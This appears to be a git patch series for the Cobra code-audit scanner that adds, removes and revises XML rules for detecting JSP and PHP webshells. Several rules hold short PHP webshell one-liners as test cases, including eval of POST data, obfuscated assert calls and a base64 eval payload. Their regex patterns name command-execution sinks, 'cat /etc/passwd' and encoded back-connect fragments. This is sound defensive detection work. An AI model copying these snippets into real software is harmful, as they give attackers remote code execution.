diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml index e69de29b..aa5482c7 100644 --- a/rules/CVI-360037.xml +++ b/rules/CVI-360037.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="exec_cmd2"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.io\.)?ProcessBuilder\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360038.xml b/rules/CVI-360038.xml index e69de29b..deff809e 100644 --- a/rules/CVI-360038.xml +++ b/rules/CVI-360038.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="browse_file"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (\.(listFiles|list|listRoots)\s*\(.+\.(readLine|read)\s*\(.+\.write\s*\()|(\.(readLine|read)\s*\(.+\.write\s*\(.+\.(listFiles|list|listRoots)\s*\() + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360039.xml b/rules/CVI-360039.xml index e69de29b..48b4e716 100644 --- a/rules/CVI-360039.xml +++ b/rules/CVI-360039.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="create_file"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.io\.)?(FileOutputStream|PrintWriter|FileWriter|RandomAccessFile)\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360040.xml b/rules/CVI-360040.xml index e69de29b..f73abc12 100644 --- a/rules/CVI-360040.xml +++ b/rules/CVI-360040.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="upload_file"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*((java\.io\.)?ServletFileUpload|(com\.jspsmart\.upload\.)?SmartUpload)\(\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360041.xml b/rules/CVI-360041.xml index e69de29b..00812f9b 100644 --- a/rules/CVI-360041.xml +++ b/rules/CVI-360041.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="net_socket"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.net\.)?ServerSocket\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360042.xml b/rules/CVI-360042.xml index e69de29b..3ee29f02 100644 --- a/rules/CVI-360042.xml +++ b/rules/CVI-360042.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="net_socket2"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.net\.)?Socket\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360043.xml b/rules/CVI-360043.xml index e69de29b..2e268ba3 100644 --- a/rules/CVI-360043.xml +++ b/rules/CVI-360043.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="net_socket3"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.net\.)?InetSocketAddress\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360044.xml b/rules/CVI-360044.xml index e69de29b..93d4bb95 100644 --- a/rules/CVI-360044.xml +++ b/rules/CVI-360044.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="http_connect"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (\w+)\s*=\s*new\s*(java\.net\.)?URL\(.*?\)[\s\S]*\1\.openConnection\(\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360045.xml b/rules/CVI-360045.xml index e69de29b..0932aee9 100644 --- a/rules/CVI-360045.xml +++ b/rules/CVI-360045.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_command"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + Runtime\.getRuntime\(\)\.exec + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360046.xml b/rules/CVI-360046.xml index e69de29b..80b1b060 100644 --- a/rules/CVI-360046.xml +++ b/rules/CVI-360046.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_unicode"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (\\u00\w\w){3,} + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360047.xml b/rules/CVI-360047.xml index e69de29b..71e740ad 100644 --- a/rules/CVI-360047.xml +++ b/rules/CVI-360047.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_class_invoke"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + \.getMethod\(.*?\.invoke + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360048.xml b/rules/CVI-360048.xml index e69de29b..4eb69f9a 100644 --- a/rules/CVI-360048.xml +++ b/rules/CVI-360048.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_class_invoke2"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (?:(?:java\.lang\.reflect\.)?Method)?\s*(\w+)\s*=\s*.*\.getMethod\([\s\S]*\1\.invoke\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360049.xml b/rules/CVI-360049.xml index e69de29b..22bcc137 100644 --- a/rules/CVI-360049.xml +++ b/rules/CVI-360049.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_url_loader"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + java\.net\.URLClassLoader + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360050.xml b/rules/CVI-360050.xml index e69de29b..8ec8f236 100644 --- a/rules/CVI-360050.xml +++ b/rules/CVI-360050.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="sql_connect"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (java\.sql\.)?DriverManager\.(getConnection|registerDriver)\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360051.xml b/rules/CVI-360051.xml index e69de29b..b7bbdca2 100644 --- a/rules/CVI-360051.xml +++ b/rules/CVI-360051.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="sql_query"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (ResultSet)?\s*\w+\s*=\s*\w+\.executeQuery\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360052.xml b/rules/CVI-360052.xml index e69de29b..9f41b62b 100644 --- a/rules/CVI-360052.xml +++ b/rules/CVI-360052.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="jdbc_drivers"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + COM\.ibm\.db2\.jdbc\.app\.DB2Driver|COM\.ibm\.db2\.jdbc\.DB2XADataSource|COM\.ibm\.db2\.jdbc\.net\.DB2Driver|com\.informix\.jdbc\.IfxDriver|com\.informix\.jdbcx\.IfxXADataSource|org\.apache\.derby\.jdbc\.ClientDriver|com\.microsoft\.sqlserver\.jdbc\.SQLServerDriver|com\.microsoft\.jdbc\.sqlserver\.SQLServerDriver|com\.mysql\.jdbc\.Driver|org\.gjt\.mm\.mysql\.Driver|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|com\.tongweb\.jdbc\.OracleDriverWrapper|org\.postgresql\.Driver|com\.sybase\.jdbc\.SybDriver|com\.sybase\.jdbc2\.jdbc\.SybXADataSource|org\.hsqldb\.jdbcDriver|com\.sybase\.jdbc3\.jdbc\.SybDriver|com\.kingbase\.Driver|dm\.jdbc\.driver\.DmDriver + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file From 2b56cae358136daa6008fa307ecbe114c2061132 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 11:11:42 +0800 Subject: [PATCH 14/29] =?UTF-8?q?=E6=9C=A8=E9=A9=AC=E7=89=B9=E5=BE=81?= =?UTF-8?q?=E6=89=AB=E6=8F=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 21 -------- rules/CVI-360002.xml | 24 --------- rules/CVI-360003.xml | 21 -------- rules/CVI-360004.xml | 24 --------- rules/CVI-360005.xml | 20 ------- rules/CVI-360006.xml | 21 -------- rules/CVI-360007.xml | 21 -------- rules/CVI-360008.xml | 22 -------- rules/CVI-360009.xml | 25 --------- rules/CVI-360011.xml | 21 -------- rules/CVI-360012.xml | 21 -------- rules/CVI-360028.xml | 19 +++++++ rules/CVI-360029.xml | 16 ++++++ rules/CVI-360030.xml | 16 ++++++ rules/CVI-360031.xml | 16 ++++++ rules/CVI-360032.xml | 8 +-- rules/CVI-360033.xml | 8 +-- tests/vulnerabilities/webshell.php | 83 +++++++++++++++++++----------- 18 files changed, 125 insertions(+), 282 deletions(-) delete mode 100644 rules/CVI-360001.xml delete mode 100644 rules/CVI-360002.xml delete mode 100644 rules/CVI-360003.xml delete mode 100644 rules/CVI-360004.xml delete mode 100644 rules/CVI-360005.xml delete mode 100644 rules/CVI-360006.xml delete mode 100644 rules/CVI-360007.xml delete mode 100644 rules/CVI-360008.xml delete mode 100644 rules/CVI-360009.xml delete mode 100644 rules/CVI-360011.xml delete mode 100644 rules/CVI-360012.xml create mode 100644 rules/CVI-360028.xml create mode 100644 rules/CVI-360029.xml create mode 100644 rules/CVI-360030.xml create mode 100644 rules/CVI-360031.xml diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml deleted file mode 100644 index 0fb57ad6..00000000 --- a/rules/CVI-360001.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell1"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[eval($_POST['C']);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml deleted file mode 100644 index 430020dd..00000000 --- a/rules/CVI-360002.xml +++ /dev/null @@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell2"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - $a="ss"; - include("sss.jpg"); - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml deleted file mode 100644 index 584f833b..00000000 --- a/rules/CVI-360003.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell3"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a)]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml deleted file mode 100644 index f48a0676..00000000 --- a/rules/CVI-360004.xml +++ /dev/null @@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell4"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - $string = 'AABBCCDDEE'; - preg_replace($_POST['A'], $_POST['B'], $string); - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml deleted file mode 100644 index 86cfbbe3..00000000 --- a/rules/CVI-360005.xml +++ /dev/null @@ -1,20 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell5"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec) - ]]></match> - <level value="7"/> - <test> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360006.xml b/rules/CVI-360006.xml deleted file mode 100644 index ada5df48..00000000 --- a/rules/CVI-360006.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell6"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[$b = $_POST['B']; preg_replace($_POST['A'], $b, $string);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml deleted file mode 100644 index 6dcdd6e4..00000000 --- a/rules/CVI-360007.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell7"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[array_map("ass\x65rt",(array)$_REQUEST['expdoor']);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml deleted file mode 100644 index a99ddcad..00000000 --- a/rules/CVI-360008.xml +++ /dev/null @@ -1,22 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell8"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml deleted file mode 100644 index 7353d189..00000000 --- a/rules/CVI-360009.xml +++ /dev/null @@ -1,25 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell9"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - $e = $_REQUEST['e']; - $arr = array($_POST['pass'],); - array_filter($arr, base64_decode($e)); - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360011.xml b/rules/CVI-360011.xml deleted file mode 100644 index fd146e44..00000000 --- a/rules/CVI-360011.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell11"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w*)\s*=\s*\bcreate_function(\b\s)*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[$newfunc = create_function(null,'assert($_POST[c]);');$newfunc();]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml deleted file mode 100644 index 2ec1505f..00000000 --- a/rules/CVI-360012.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;(\n)*[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml new file mode 100644 index 00000000..ee59faee --- /dev/null +++ b/rules/CVI-360028.xml @@ -0,0 +1,19 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell28"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml new file mode 100644 index 00000000..265c9dbc --- /dev/null +++ b/rules/CVI-360029.xml @@ -0,0 +1,16 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell29"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml new file mode 100644 index 00000000..2ac9f909 --- /dev/null +++ b/rules/CVI-360030.xml @@ -0,0 +1,16 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell30"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml new file mode 100644 index 00000000..2b43470f --- /dev/null +++ b/rules/CVI-360031.xml @@ -0,0 +1,16 @@ +<?xml version="1.0" encoding="UTF-8"?> 